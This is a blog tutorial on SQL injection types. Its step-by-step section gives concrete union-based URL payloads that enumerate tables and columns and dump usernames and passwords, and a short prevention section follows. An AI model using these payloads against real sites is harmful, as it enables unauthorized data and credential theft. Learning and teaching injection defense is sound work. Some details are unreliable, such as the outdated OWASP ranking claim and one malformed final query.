SQL INJECTION
Hello everyone, in this blog, we will discuss SQL Injection which is a very critical vulnerability and it is rated on no. 1 position on OWASP(Open Web Application Security Project) Top 10 since 2010.
SQL Injection:- It allows an attacker to intrude into the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve and the credentials which are not meant to be visible publicly. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure by performing RCE (Remote Code Execution).
impact of SQL injection attack:- A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines.
Types of SQL Injections
The three main types of SQL Injections are:-
1. In-Band SQL Injection (Classic SQL Injection).
2. Inferential SQL Injection (Blind SQL Injection).
3. Out-of-band SQL Injection.
1. In-band SQL Injection
In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.
The two most common types of In-band SQL Injection are Error-based SQL Injection and Union-based SQL Injection.
- Error-Based SQL Injection:- Error-based SQL Injection is a technique that relies on error messages thrown by the database server to obtain information about the structure of the database. and from error messages, we can get database structure, tables, columns, etc.
- Union-based SQLi:- Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.
2. Inferential SQL Injection(Blind SQLi)
Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack. Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server.
The two types of inferential SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.
Boolean-base Blind SQL Injection
Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.
Time-based Blind SQL Injection
Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.
Out-of-band SQL Injection
Out-of-band-SQL-Injections not very common, mostly because it depends on features being enabled on the database server being used by the web application. So according to that attacker have to make payloads regarding this.
The possible implementations of SQL Injection with Payloads
Step 1- First, we have to find the value that does not exist in the parameter within the URL by changing its value like -1 or 2234599 or 1 2 3 4 5 which gives you no output, just by manipulating parameter values.
Step 2 - Break the query to bring out an error in order to insert our query which later digs out the information that we needed.
we can break query by using the following :
Single quote -‘
Double quote -“
Backward slash -\
Bracket “Closing” -)
Single quote with closing bracket -‘)
Double quote with closing bracket -“)
And sometimes we don’t need to break the query.
Step 3 -Joining The Query.
In order to execute our query, we also need to join the query that we broke earlier in Step 2
we can join query by using the following :
— +
— space or — %20 (%20 is space)
# or %23 (here %23 is the value of hash)
1' or ‘1
1’ or 1=’1
‘) — + (if code contains () brackets)
Step 4 -Find out the number of columns using the query
We can find a number of columns by using the ORDER BY clause in the URL.
In order to get the number of columns, we need to use ORDER BY and just insert numbers in ascending order like 1 2 3 4… so whenever it gives us an error like “ Unknown column in order clause “ that means the number we inserted in the ORDER BY is 1 more than the number of columns so just insert the last digit which doesn’t give an error and that will be the number of columns present in the table.
The query would look something like this:
order by 1
order by 2
order by 3
and the URL would look something like :
?id=1' order by 1 — +
?id=1' order by 2 — +
Step 5 -Find where the SQL is showing its output using UNION
This step is important because it decides where our payload is going to be. UNION ALL operator is used to combine the result sets of 2 or more SELECT statements.
Query
UNION ALL select 1,2,3… (depends on the no. of columns we found)
URL
?id=1' union all select database(),2,3 — +
like here our payload is the database() which gives us the name of the database if this doesn’t show us some output then we just have to change the place of our payload.
something like this
?id=1' union all select 1,database(),3 — +
or
?id=1' union all select 1,2,database() — +
we can use the following in the place of our payload to get information about the database in the place of our previous payload.
database() (Database name)
Version() or @@version (MySQL version)
current_user (Current user name)
Step 6 -Get Table names from the database
To get the table names we have to use the Information schema. The information schema is a database that provides the access to details related to databases and their objects like (tables, columns) stored on the server.
Now our query would look something like this :
union all select 1,table_name,3 from information_schema.tables
The place where we put 2 in our query is printing on the screen so that’s why that place became our payload injector.
union all select 1,table_name,3 from information_schema.tables — +
To get all table names at once just comment out after our query by adding “ — +” to the end
union all select 1,table_name,3 from information_schema.tables limit 0,1 — +
now from here, we can control the output by using limit like 0,1 1,1 1,2
union all select 1,table_name,3 from information_schema.tables where table_schema=’Database name’ limit 0,1 — +
here we are retrieving data according to the name of the database which we found earlier in Step 5
Either you give the name of the database or call a function “database()” this will get you the name of tables
?id=-1' union all select table_name,2 from information_schema.tables where table_schema=database() — +
using the where clause we can filter the output.
or
You can directly call your table associated with that database like this
?id=-1' union all select table_name,2 from information_schema.tables where table_schema=’database name’ — +
Step 7 -Get all table name from the database one by one
we can use “group_concat()” here
URL
?id=-1' union all select group_concat(table_name),2 from information_schema.tables where table_schema=database() limit 0,1 — +
Find out which table seems important to you then get data from that table like emails or passwords or usernames.
Step 8 -Get all Tables name from database at once
In order to get all the table names at once we can use following query:
union all select group_concat(table_name),2 from information_schema.tables where table_schema=database()
union all select group_concat(table_name),2 from information_schema.tables where table_schema=’Database name’
and url will look something like
?id=-1' union all select group_concat(table_name),2 from information_schema.tables where table_schema=’Database name’ — +
Step 9 -Find The name of columns
Get all Column names from the table at once by using this query.
query
union all select group_concat(column_name),2,3 from information_schema.columns where table_name=’table name’
url
?id=-1' union all select group_concat(column_name),2,3 from information_schema.columns where table_name=’table name’ — +
In the previous Step-8 we got the name of tables that’s why we are using the table name in this query.
Step 10 -Get all data from columns at once
We got tables name and column names now we can retrieve data.
query
union all select group_concat(username),group_concat(password),3 from users where table_schema=database()
URL
?id=-1' union all select group_concat(username),group_concat(password),3 from users where table_schema=database() — +
This will give all the data at once in order to get it one by one use the following query
union all select id, username, password from users
Here id, users, and password are column names, and users is the table name.
And from here we can Dump data contained by the database. And similarly, we can use boolean-based and Time-based SQL Injections which is somehow more complex and time taking and we have to use them because not all the databases are highly vulnerable.
NOTE:- ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL
SQL injection prevention techniques
Input validation
The validation process is aimed at verifying whether or not the type of input submitted by a user is allowed. Input validation makes sure it is the accepted type, length, format, and so on. Only the value which passes the validation can be processed.
Parametrized queries
Parameterized queries are a means of pre-compiling an SQL statement so that you can then supply the parameters in order for the statement to be executed. This method makes it possible for the database to recognize the code and distinguish it from input data.
Escaping
Always use character-escaping functions for user-supplied input provided by each database management system (DBMS). This is done to make sure the DBMS never confuses it with the SQL statement provided by the developer.
Avoiding administrative privileges
Don’t connect your application to the database using an account with root access. This should be done only if absolutely needed since the attackers could gain access to the whole system. Even the non-administrative accounts server could place risk on an application, even more so if the database server is used by multiple applications and databases.
Web application firewall
One of the best practices to identify SQL injection attacks is having a web application firewall (WAF). A WAF operating in front of the web servers monitors the traffic which goes in and out of the web servers and identifies patterns that constitute a threat. Essentially, it is a barrier put between the web application and the Internet.
Prevention techniques such as input validation parametrized queries and escaping work well with varying attack vectors. However, because of the large variation in the pattern of SQL injection attacks, they are often unable to protect databases.
THANK YOU FOR READING THE BLOG.
AND WHILE READING IF YOU FIND THIS BLOG INFORMATIONAL AND USEFULL THEN FOLLOWING ME ON TWITTER AND LINKEDIN WILL BE SPECTACULAR.
